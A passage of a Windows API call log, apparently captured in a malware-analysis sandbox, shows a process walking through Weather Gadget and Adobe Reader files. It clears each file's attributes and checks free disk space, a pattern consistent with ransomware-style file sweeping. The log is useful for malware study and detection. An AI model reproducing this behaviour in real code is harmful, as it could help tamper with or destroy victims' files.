[0106.630] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.637] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_snow.png", dwFileAttributes=0x80) returned 0 [0106.638] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.648] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_thunderstorm.png", dwFileAttributes=0x80) returned 0 [0106.650] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.657] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_windy.png", dwFileAttributes=0x80) returned 0 [0106.659] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.666] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0106.668] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.675] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_snow.png", dwFileAttributes=0x80) returned 0 [0106.676] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.682] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_sun.png", dwFileAttributes=0x80) returned 0 [0106.684] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.691] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_windy.png", dwFileAttributes=0x80) returned 0 [0106.692] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.698] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_cloudy.png", dwFileAttributes=0x80) returned 0 [0106.700] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.706] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_few-showers.png", dwFileAttributes=0x80) returned 0 [0106.726] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.732] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_foggy.png", dwFileAttributes=0x80) returned 0 [0106.734] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.742] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_hail.png", dwFileAttributes=0x80) returned 0 [0106.744] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.750] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_rainy.png", dwFileAttributes=0x80) returned 0 [0106.752] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.758] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_snow.png", dwFileAttributes=0x80) returned 0 [0106.759] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.765] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_thunderstorm.png", dwFileAttributes=0x80) returned 0 [0106.767] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0106.767] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0106.767] CoTaskMemFree (pv=0x506980) [0106.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0106.775] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0106.778] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)alertIcon.png", dwFileAttributes=0x80) returned 0 [0106.779] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0106.783] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)grayStateIcon.png", dwFileAttributes=0x80) returned 0 [0106.785] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0106.789] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)greenStateIcon.png", dwFileAttributes=0x80) returned 0 [0106.790] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0106.794] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)notConnectedStateIcon.png", dwFileAttributes=0x80) returned 0 [0106.795] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0106.798] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)redStateIcon.png", dwFileAttributes=0x80) returned 0 [0106.799] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0106.799] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0106.799] CoTaskMemFree (pv=0x506980) [0106.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0106.806] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0106.810] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)alertIcon.png", dwFileAttributes=0x80) returned 0 [0106.811] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0106.815] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)grayStateIcon.png", dwFileAttributes=0x80) returned 0 [0106.816] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0106.820] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)greenStateIcon.png", dwFileAttributes=0x80) returned 0 [0106.821] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0106.824] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)notConnectedStateIcon.png", dwFileAttributes=0x80) returned 0 [0106.826] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0106.829] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)redStateIcon.png", dwFileAttributes=0x80) returned 0 [0106.830] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0106.830] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0106.830] CoTaskMemFree (pv=0x506980) [0106.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0106.831] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0106.831] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0106.831] CoTaskMemFree (pv=0x506980) [0106.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0106.831] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0106.831] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0106.832] CoTaskMemFree (pv=0x506980) [0106.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0106.832] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0106.832] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0106.832] CoTaskMemFree (pv=0x506980) [0106.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0106.834] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0106.840] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", dwFileAttributes=0x80) returned 1 [0106.843] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0106.849] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", dwFileAttributes=0x80) returned 1 [0106.853] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0106.858] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", dwFileAttributes=0x80) returned 1 [0106.861] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0106.866] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", dwFileAttributes=0x80) returned 1 [0106.870] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0106.875] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", dwFileAttributes=0x80) returned 1 [0106.878] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0106.882] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", dwFileAttributes=0x80) returned 1 [0106.885] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0106.890] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm", dwFileAttributes=0x80) returned 1 [0106.893] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0106.898] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm", dwFileAttributes=0x80) returned 1 [0106.901] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0106.906] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm", dwFileAttributes=0x80) returned 1 [0106.910] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0106.915] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm", dwFileAttributes=0x80) returned 1 [0106.918] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0106.922] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm", dwFileAttributes=0x80) returned 1 [0106.925] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0106.937] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm", dwFileAttributes=0x80) returned 1 [0106.941] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0106.946] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm", dwFileAttributes=0x80) returned 1 [0106.949] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0106.953] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm", dwFileAttributes=0x80) returned 1 [0106.956] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0106.961] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm", dwFileAttributes=0x80) returned 1 [0106.964] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0106.969] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm", dwFileAttributes=0x80) returned 1 [0106.972] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0106.976] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm", dwFileAttributes=0x80) returned 1 [0106.979] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0106.983] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm", dwFileAttributes=0x80) returned 1 [0106.986] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0106.992] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm", dwFileAttributes=0x80) returned 1 [0106.995] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0107.000] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm", dwFileAttributes=0x80) returned 1 [0107.002] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0107.009] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm", dwFileAttributes=0x80) returned 1 [0107.011] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0107.016] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm", dwFileAttributes=0x80) returned 1 [0107.019] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0107.025] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm", dwFileAttributes=0x80) returned 1 [0107.028] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0107.033] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm", dwFileAttributes=0x80) returned 1 [0107.035] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0107.040] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm", dwFileAttributes=0x80) returned 1 [0107.043] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0107.048] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm", dwFileAttributes=0x80) returned 1 [0107.051] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0107.056] SetFileAttributesW (lpFileName="C:\\Program Files 